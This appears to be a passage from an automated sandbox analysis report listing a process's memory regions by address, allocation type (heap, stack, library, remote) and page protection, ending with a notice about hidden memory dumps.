page read and write
608000
heap
page read and write
24B8000
trusted library allocation
page read and write
2FC8000
trusted library allocation
page read and write
2EB0000
trusted library allocation
page read and write
2AFE000
stack
page read and write
2EEC000
trusted library allocation
page read and write
2EB0000
heap
page read and write
350000
heap
page read and write
2436000
trusted library allocation
page read and write
10000
heap
page read and write
4433000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
2ED0000
heap
page read and write
10057000
unkown
page read and write
2F30000
trusted library allocation
page read and write
291B000
trusted library allocation
page read and write
2CF0000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
2D09000
trusted library allocation
page read and write
7FF00290000
trusted library allocation
page execute and read and write
4AE000
heap
page read and write
4BA000
heap
page read and write
1F76000
trusted library allocation
page read and write
31C000
heap
page read and write
2835000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
1D6000
trusted library allocation
page read and write
24AD000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
2C6000
trusted library allocation
page read and write
1005A000
unkown
page readonly
4433000
trusted library allocation
page read and write
2950000
unkown
page read and write
2E79000
heap
page read and write
8BBE000
trusted library allocation
page read and write
42E000
heap
page read and write
960000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
2F19000
heap
page read and write
6B7000
heap
page read and write
271C000
trusted library allocation
page read and write
380B000
trusted library allocation
page read and write
150000
heap
page read and write
24D5000
trusted library allocation
page read and write
1F80000
trusted library allocation
page read and write
271C000
trusted library allocation
page read and write
27C4000
trusted library allocation
page read and write
1F44000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
2E69000
heap
page read and write
E10000
heap
page read and write
28F7000
trusted library allocation
page read and write
2BA000
stack
page read and write
22B000
stack
page read and write
1FE0000
heap
page read and write
7EFD7000
unkown
page read and write
2276000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
10000
heap
page read and write
2F8E000
trusted library allocation
page read and write
2F51000
trusted library allocation
page read and write
10000
heap
page read and write
2E8E000
heap
page read and write
1BD7D000
stack
page read and write
839E000
trusted library allocation
page read and write
488D000
heap
page read and write
28F7000
trusted library allocation
page read and write
271A000
trusted library allocation
page read and write
2530000
trusted library allocation
page read and write
26ED000
stack
page read and write
2708000
trusted library allocation
page read and write
1CC000
stack
page read and write
2330000
heap
page read and write
2CFD000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
388000
heap
page read and write
2EF5000
heap
page read and write
2C24000
heap
page read and write
2D02000
trusted library allocation
page read and write
70A000
heap
page read and write
4433000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
2C49000
trusted library allocation
page read and write
2EDA000
heap
page read and write
2ECB000
heap
page read and write
8E9E000
trusted library allocation
page read and write
2140000
unkown
page readonly
24F0000
heap
page read and write
2CF4000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
3170000
trusted library allocation
page read and write
24F9000
heap
page read and write
2EE3000
heap
page read and write
2D0000
heap
page read and write
1F68000
trusted library allocation
page read and write
289D000
stack
page read and write
270F000
trusted library allocation
page read and write
2F48000
trusted library allocation
page read and write
1C0000
heap
page read and write
2CEB000
trusted library allocation
page read and write
7FF000F5000
trusted library allocation
page read and write
31C0000
trusted library allocation
page read and write
403000
heap
page read and write
2F51000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
3196000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
2F50000
trusted library allocation
page read and write
680000
heap
page read and write
4433000
trusted library allocation
page read and write
2FA0000
trusted library allocation
page read and write
2EF4000
heap
page read and write
2EEB000
heap
page read and write
912E000
trusted library allocation
page read and write
10000
heap
page read and write
1F88000
trusted library allocation
page read and write
35CA000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
130000
heap
page read and write
2870000
trusted library allocation
page read and write
887E000
trusted library allocation
page read and write
2620000
heap
page read and write
3F8000
heap
page read and write
10057000
unkown
page read and write
2707000
trusted library allocation
page read and write
25AF000
trusted library allocation
page read and write
430000
heap
page read and write
322C000
stack
page read and write
2900000
trusted library allocation
page read and write
24A3000
trusted library allocation
page read and write
7FF00022000
trusted library allocation
page execute and read and write
20000
heap
page read and write
28F7000
trusted library allocation
page read and write
48CC000
heap
page read and write
2220000
heap
page read and write
2EE2000
heap
page read and write
2904000
trusted library allocation
page read and write
1E98000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
83CE000
trusted library allocation
page read and write
10057000
unkown
page read and write
2CF4000
trusted library allocation
page read and write
1FE5000
heap
page read and write
2FA0000
trusted library allocation
page read and write
1005A000
unkown
page readonly
8EFE000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
35D0000
trusted library allocation
page read and write
10057000
unkown
page read and write
25AF000
trusted library allocation
page read and write
2220000
heap
page read and write
24D5000
trusted library allocation
page read and write
8FAE000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
1FDB000
heap
page read and write
24AD000
trusted library allocation
page read and write
1C86000
heap
page read and write
1C0000
heap
page read and write
1F44000
trusted library allocation
page read and write
470000
heap
page read and write
308A000
trusted library allocation
page read and write
2F9E000
stack
page read and write
24D5000
trusted library allocation
page read and write
883E000
trusted library allocation
page read and write
48D000
heap
page read and write
1F88000
trusted library allocation
page read and write
A90000
heap
page read and write
441B000
trusted library allocation
page read and write
487000
heap
page read and write
2B06000
trusted library allocation
page read and write
2ED6000
trusted library allocation
page read and write
34D000
heap
page read and write
24ED000
stack
page read and write
35BA000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
1ED5000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
35A1000
trusted library allocation
page read and write
3258000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
2703000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
10000000
unkown
page readonly
28F7000
trusted library allocation
page read and write
912E000
trusted library allocation
page read and write
420000
heap
page read and write
4433000
trusted library allocation
page read and write
2ED6000
heap
page read and write
25AF000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
8FBE000
trusted library allocation
page read and write
2F01000
heap
page read and write
4424000
trusted library allocation
page read and write
4424000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
795000
trusted library allocation
page read and write
2E66000
heap
page read and write
24B7000
trusted library allocation
page read and write
31E4000
trusted library allocation
page read and write
2430000
heap
page read and write
442000
heap
page read and write
2F48000
trusted library allocation
page read and write
1FA0000
heap
page read and write
2B0000
heap
page read and write
458000
heap
page read and write
2EEA000
heap
page read and write
4D3000
heap
page read and write
10000
heap
page read and write
31D000
heap
page read and write
25AF000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
650000
heap
page read and write
4433000
trusted library allocation
page read and write
196000
trusted library allocation
page read and write
270A000
trusted library allocation
page read and write
270E000
trusted library allocation
page read and write
27C000
stack
page read and write
230000
unkown
page read and write
2380000
trusted library allocation
page read and write
2E9D000
heap
page read and write
1BB4E000
stack
page read and write
24A9000
trusted library allocation
page read and write
540000
heap
page read and write
2FAF000
trusted library allocation
page read and write
2944000
trusted library allocation
page execute
295C000
stack
page read and write
848E000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
4AB0000
heap
page read and write
2707000
trusted library allocation
page read and write
30E0000
trusted library allocation
page read and write
10000000
unkown
page readonly
3060000
trusted library allocation
page read and write
2E9D000
heap
page read and write
24B7000
trusted library allocation
page read and write
345000
heap
page read and write
2FA0000
trusted library allocation
page read and write
54E000
heap
page read and write
271A000
trusted library allocation
page read and write
2FF6000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page read and write
271A000
trusted library allocation
page read and write
7FF000FA000
trusted library allocation
page execute and read and write
6D8000
heap
page read and write
8E0000
heap
page read and write
13C000
stack
page read and write
910000
trusted library allocation
page read and write
1F61000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2D0C000
trusted library allocation
page read and write
431000
heap
page read and write
90E000
stack
page read and write
10000
heap
page read and write
2CFA000
trusted library allocation
page read and write
2D00000
trusted library allocation
page read and write
2F0C000
heap
page read and write
271A000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
2ECB000
heap
page read and write
3526000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
10053000
unkown
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
24B1000
trusted library allocation
page read and write
2C49000
trusted library allocation
page read and write
252F000
heap
page read and write
3000000
trusted library allocation
page read and write
2707000
trusted library allocation
page read and write
48B000
heap
page read and write
3A5D000
trusted library allocation
page read and write
2E94000
heap
page read and write
25AF000
trusted library allocation
page read and write
245000
trusted library allocation
page read and write
3F9000
heap
page read and write
28FF000
stack
page read and write
1F68000
trusted library allocation
page read and write
2EFF000
stack
page read and write
2F0C000
heap
page read and write
24B0000
trusted library allocation
page read and write
2FD3000
trusted library allocation
page read and write
1BB70000
heap
page read and write
2EE2000
heap
page read and write
25AF000
trusted library allocation
page read and write
1EB2000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
544000
heap
page read and write
23A5000
trusted library allocation
page read and write
2EA5000
trusted library allocation
page read and write
1C8C3000
heap
page read and write
170000
trusted library allocation
page read and write
24AD000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
674000
heap
page read and write
480000
heap
page read and write
1F76000
trusted library allocation
page read and write
2ED6000
heap
page read and write
42D000
heap
page read and write
2940000
trusted library allocation
page execute
2E76000
heap
page read and write
65C000
heap
page read and write
2F02000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
4A91000
heap
page read and write
2760000
heap
page read and write
2F48000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
34DB000
trusted library allocation
page read and write
271C000
trusted library allocation
page read and write
2744000
heap
page read and write
379000
heap
page read and write
1E30000
heap
page read and write
48D2000
heap
page read and write
2F40000
trusted library allocation
page read and write
24D5000
trusted library allocation
page read and write
432000
heap
page read and write
270000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
24A5000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page read and write
4BD000
heap
page read and write
48B5000
heap
page read and write
441B000
trusted library allocation
page read and write
2CFD000
trusted library allocation
page read and write
31F6000
trusted library allocation
page read and write
2ED6000
heap
page read and write
10000
heap
page read and write
1F61000
trusted library allocation
page read and write
4433000
trusted library allocation
page read and write
4886000
heap
page read and write
34D000
heap
page read and write
2560000
heap
page read and write
771000
heap
page read and write
33EA000
trusted library allocation
page read and write
342000
heap
page read and write
7FF00032000
trusted library allocation
page execute and read and write
48D2000
heap
page read and write
2885000
trusted library allocation
page read and write
28E0000
trusted library allocation
page read and write
936000
trusted library allocation
page read and write
271A000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
2EE2000
heap
page read and write
31D1000
trusted library allocation
page read and write
1F44000
trusted library allocation
page read and write
1F88000
trusted library allocation
page read and write
EB000
stack
page read and write
29DA000
heap
page execute and read and write
2CFD000
trusted library allocation
page read and write
14C000
stack
page read and write
1F76000
trusted library allocation
page read and write
388000
heap
page read and write
201B000
heap
page read and write
3D0000
heap
page read and write
2930000
remote allocation
page read and write
2CFD000
trusted library allocation
page read and write
4250000
heap
page read and write
3017000
trusted library allocation
page read and write
1B7BC000
heap
page read and write
2A9C000
stack
page read and write
1B380000
heap
page read and write
2380000
trusted library allocation
page read and write
3170000
trusted library allocation
page read and write
2755000
trusted library allocation
page read and write
24B7000
trusted library allocation
page read and write
2CEB000
trusted library allocation
page read and write
1F44000
trusted library allocation
page read and write
441B000
trusted library allocation
page read and write
266E000
stack
page read and write
2707000
trusted library allocation
page read and write
45D000
heap
page read and write
24D5000
trusted library allocation
page read and write
24E0000
heap
page read and write
There are 1668 hidden memdumps, click here to show them.